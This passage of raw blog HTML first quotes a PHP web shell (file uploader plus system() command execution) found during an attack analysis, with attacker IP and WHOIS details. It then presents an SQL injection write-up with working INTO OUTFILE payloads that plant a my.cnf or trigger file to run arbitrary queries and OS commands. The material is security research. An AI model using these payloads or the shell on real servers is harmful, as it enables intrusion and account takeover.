<input type=\"submit\" name=\"submit\" value=\"uplod\"><br />
</form>";<br />
if ($_FILES["file"]["error"] > 0)<br />
{<br />
echo "gagal: " . $_FILES["file"]["error"] . "<br />";<br />
}<br />
else<br />
{<br />
echo "sukses: " . $_FILES["file"]["name"] . "<br />";<br />
echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";<br />
echo "mentah: " . $_FILES["file"]["tmp_name"];<br />
}<br />
if (file_exists("" . $_FILES["file"]["name"]))<br />
{<br />
echo $_FILES["file"]["name"] . " wes enek cok. ";<br />
}<br />
else<br />
{<br />
move_uploaded_file($_FILES["file"]["tmp_name"],<br />
"" . $_FILES["file"]["name"]);<br />
echo " mateng: " . "" . $_FILES["file"]["name"];<br />
echo"<hr>";<br />
}<br />
}<br />
elseif ($_GET["empix"]){<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>system($_GET["empix"]);<br />
}<br />
else {<br />
$un = php_uname();<br />
$sof1 = getenv("SERVER_SOFTWARE");<br />
$php1 = phpversion();<br />
echo "empixcrew: $un $php1 :empixcrew";<br />
}<br />
?><br />
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT> </blockquote>Location of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell<br />
.php<br />
<br />
Attacks coming from IP <b>187.17.65.242 </b>Brasil<br />
<br />
WHOIS:<br />
<blockquote><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">inetnum: 187.17.64/18 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">aut-num: AS15201 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">abuse-c: SEO50 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">owner: Universo Online S.A. </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">ownerid: 001.109.184/0001-95 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">responsible: Contato da Entidade UOL </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">country: BR </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">owner-c: CAU12 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">tech-c: CAU12 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">inetrev: 187.17.64/20 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">nserver: ns1.host.uol.com.br </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">nsstat: 20120412 AA </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">nslastaa: 20120412 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">nserver: ns2.host.uol.com.br </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">nsstat: 20120412 AA </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">nslastaa: 20120412 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">created: 20081022 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">changed: 20081022 </span><br style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;" /><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">nic-hdl-br: CAU12 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">person: Contato Administrativo - UOL </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">e-mail: l-registrobr-uol@corp.uol.com.br </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">created: 20031202 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">changed: 20100106 </span><br style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;" /><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">nic-hdl-br: SEO50 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">person: Security Office </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">e-mail: security@uol.com.br </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">created: 20021114 </span><span style="font-family: 'Trebuchet MS', Arial, Tahoma, Verdana, sans-serif; font-size: 11px; line-height: 14px; text-align: -webkit-auto;">changed: 20110830 </span></blockquote>We strongly recommend to block this ip address and run the following command to detect attacks:<br />
#egrep -n --color "hell.php" *.log<br />
</div>Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com5tag:blogger.com,1999:blog-7173843122198586393.post-74642403211651504612012-03-04T11:45:00.009-08:002012-07-26T12:13:01.976-07:00Advanced SQLi exploitation with FILE_PRIV<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<span style="background-color: white;"><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">We</span><span style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">would like to open</span><span style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">our blog</span><span style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">notes on</span><span style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">the practical implementation of</span><span style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">the SQL-injections. </span></span></div>
<div style="text-align: left;">
<span style="background-color: white;"><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">And also</span><span style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> we </span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">try </span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">to</span><span style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">focus</span><span style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">more attention on</span><span style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">the practical aspects of</span><span style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">web application security in the future.</span></span><br />
<span style="background-color: white;"><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"><br />
</span></span></div>
<div style="text-align: left;">
<span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">SQL injections are the most common</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">server-side</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">Web application</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">vulnerabilities</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">and meet</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> almost</span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"></span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">every</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">audit</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">in our practice.</span></div>
<div style="text-align: left;">
<span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">Very often</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">it happens that</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">through these</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">vulnerabilities</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> we </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">can</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">write files (granted FILE_PRIV).</span></div>
<div style="text-align: left;">
<span class="hps" style="color: #333333; font-family: arial, sans-serif;"><span class="hps" style="background-color: white;"><span class="hps">The simplest</span> <span class="hps">way of the</span> <span class="hps">exploitation</span> <span class="hps">in this case</span> <span class="hps">- write</span> <span class="hps">executable</span> <span class="hps">script (i.e. shell.php) in www-root (i.e. /var/www/).</span></span></span><br />
<span class="hps" style="color: #333333; font-family: arial, sans-serif;"><span class="hps"><span class="hps" style="background-color: white;">But sometimes there is no filesystem rights to write in /var/www.</span></span></span><br />
<span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;"><br />
</span><br />
<span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">We</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">would like to present</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">a method</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">for the operation of</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">these vulnerabilities</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">to</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif;">execute arbitrary queries and even commands (tested in Debian lenny).</span><br />
<span class="hps" style="color: #333333; font-family: arial, sans-serif;"><span class="hps"><span class="hps"><span class="hps"><b style="background-color: white; color: black; font-family: Times;"><span class="hps" style="color: #333333; font-family: arial, sans-serif;">This is</span><span style="color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif;">not the easiest</span><span style="color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif;">attack vector</span><span class="" style="color: #333333; font-family: arial, sans-serif;">, but it</span><span style="color: #333333; font-family: arial, sans-serif;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif;">is possible!</span></b></span></span></span></span></div>
<div style="text-align: left;">
<span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"><br />
</span><br />
<span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">The idea</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">is very simple and</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">is</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">to</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">replace</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">the file</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">my.cnf. </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">This</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">configuration file</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">is</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">write-protected</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">directory:</span></div>
<div style="text-align: left;">
<span style="background-color: white;"><span style="color: #333333; font-family: arial, sans-serif;"></span></span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #38761d; font-family: arial, sans-serif;">-rw-r--r-- 1 root root 3596 /etc/mysql/my.cnf</span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">#debian lenny</span></div>
<div style="text-align: left;">
<span class="hps" style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">However</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">, <b>if</b></span><b style="background-color: white;"><span style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> </span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">you write</span><span style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> my.cnf</span><span class="hps" style="color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"> in</span></b><span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"><b> DATADIR it will work</b>! And DATADIR is writable always:</span></div>
<div style="text-align: left;">
<span style="background-color: white; color: red; font-family: arial, sans-serif;">drwx------ 4 mysql mysql 4096 /var/lib/mysql</span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">#debian lenny</span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;"><br />
</span><br />
<span style="background-color: white; color: #333333; font-family: arial, sans-serif; text-align: -webkit-auto;">Then look at documentation:</span></div>
<div style="text-align: left;">
<a href="http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_init_connect" style="background-color: white; font-family: arial, sans-serif; text-align: -webkit-auto;">http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_init_connect</a></div>
<div style="text-align: left;">
<span style="text-align: -webkit-auto;"><span style="color: #333333; font-family: arial, sans-serif;"><a href="http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_init_file" style="background-color: white;">http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_init_file</a></span></span></div>
<div style="text-align: left;">
<span style="color: #333333; font-family: arial, sans-serif;"><a href="http://dev.mysql.com/doc/refman/5.1/en/replication-options-slave.html#sysvar_init_slave" style="background-color: white;">http://dev.mysql.com/doc/refman/5.1/en/replication-options-slave.html#sysvar_init_slave</a></span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;"><br />
</span><br />
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">Finally, attack vector will be like that:</span></div>
<div style="text-align: left;">
<span style="background-color: white;"><span style="color: #333333; font-family: arial, sans-serif;">'<b>AND</b> 1<b>=</b>2 <b>UNION</b> <b>SELECT</b> '</span><span style="font-family: arial, sans-serif;"><b><span style="color: red;">[mysqld]</span><span style="color: #38761d;">\n</span><span style="color: red;">init-connect="update users set passwd=123 where id=0"</span><span style="color: #38761d;">\n#</span></b></span><span style="color: #333333; font-family: arial, sans-serif;">' </span></span><br />
<span style="background-color: white;"><span style="color: #333333; font-family: arial, sans-serif;"><b>INTO</b> <b>OUTFILE</b> '</span><span style="text-align: left;"><span style="color: #38761d; font-family: arial, sans-serif;"><b>/var/lib/mysql/my.cnf</b></span></span><span style="color: #333333; font-family: arial, sans-serif;">'<b>-- -</b></span></span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;"><br />
</span><br />
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">Now you can execute any query from SQL-injection into SELECT statement and FILE_PRIV.</span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">Query in init-connect</span><span style="background-color: white;"><span style="color: #333333; font-family: arial, sans-serif;"> will be executed after the non-SUPER user logs in. </span></span></div>
<div style="text-align: left;">
<span style="text-align: left;"><span style="background-color: white; color: #333333; font-family: arial, sans-serif;">And there is another problem - you must somehow restart MySQL daemon.</span></span></div>
<div style="text-align: left;">
<span style="text-align: left;"><span style="background-color: white; color: #333333; font-family: arial, sans-serif;">The easiest way to wait until it happens naturally.</span></span></div>
<div style="text-align: left;">
<span style="text-align: left;"><span style="background-color: white; color: #333333; font-family: arial, sans-serif;">But you can always send a hard query to exceed a memory limit. </span></span></div>
<div style="text-align: left;">
<span style="text-align: left;"><span style="background-color: white; color: #333333; font-family: arial, sans-serif;">Then OOM Killer make your job ;)</span></span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;"><br />
</span><br />
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">On MySQL 5.1.2+ (required by </span><span style="background-color: white;"><span style="color: #333333; font-family: arial, sans-serif;"><a href="http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_plugin_dir">http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_plugin_dir</a></span></span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;">) you can also execute OS commands by my.cnf like that:</span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">[mysqld]</span></div>
<div style="text-align: left;">
<span style="background-color: white; font-family: arial, sans-serif;"><span style="color: #333333;"><b>plugin_dir</b> = </span><span style="color: red;">/var/tmp/aaa </span># 5.1.2+ only</span></div>
<div style="text-align: left;">
<span style="background-color: white; font-family: arial, sans-serif;"><span style="color: #333333;"><b>init-connect</b> = "</span><span style="color: #38761d;">CREATE FUNCTION do_system RETURNS INTEGER SONAME</span><span style="color: #333333;"> '</span><span style="color: red;">so_system.so.0.0</span><span style="color: #333333;">';"</span></span></div>
<div style="color: #333333; text-align: left;">
<span style="background-color: white; font-family: arial, sans-serif;"># 2 3 4 5 6 7 8 9 10 11</span></div>
<div style="text-align: left;">
<div style="color: #333333;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">Where </span><span style="background-color: white; color: red; font-family: arial, sans-serif;">/var/tmp/aaa</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> is any writable directory, </span><span style="background-color: white; color: red; font-family: arial, sans-serif;">so_system.so.0.0</span><span style="background-color: white; color: #333333; font-family: arial, sans-serif;"> is your binary library.</span></div>
<div>
<div style="color: #333333;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;"><br />
</span></div>
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">UPDATE: see also genius work from: </span><span style="color: #333333; font-family: arial, sans-serif;"><a href="http://www.wisec.it/sectou.php?p=1">http://www.wisec.it/sectou.php?p=1</a></span><br />
<blockquote class="tr_bq">
<span style="background-color: white; font-family: arial; font-size: 12px;">AND 1=0 union select 'TYPE=TRIGGERS' into outfile</span><span style="background-color: white; font-family: arial; font-size: 12px;">'/var/lib/mysql/users/user.TRG' LINES TERMINATED BY '\\ntriggers=\'CREATE</span><span style="background-color: white; font-family: arial; font-size: 12px;">DEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin</span><span style="background-color: white; font-family: arial; font-size: 12px;">\\nupdate user set isadmin=0 where</span><span style="background-color: white; font-family: arial; font-size: 12px;">isadmin=1;\\nend\'sql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'l</span><span style="background-color: white; font-family: arial; font-size: 12px;">atin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedi</span><span style="background-color: white; font-family: arial; font-size: 12px;">sh_ci\'\n';</span></blockquote>
<div style="color: #333333;">
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;"><br /></span></div>
</div>
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">Thank you for your attention.</span><br />
<span style="background-color: white; color: #333333; font-family: arial, sans-serif;">//Alexander Golovko, Vladimir <a href="https://twitter.com/#!@d0znpp">d0znpp</a> Vorontsov </span></div>
</div>Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com7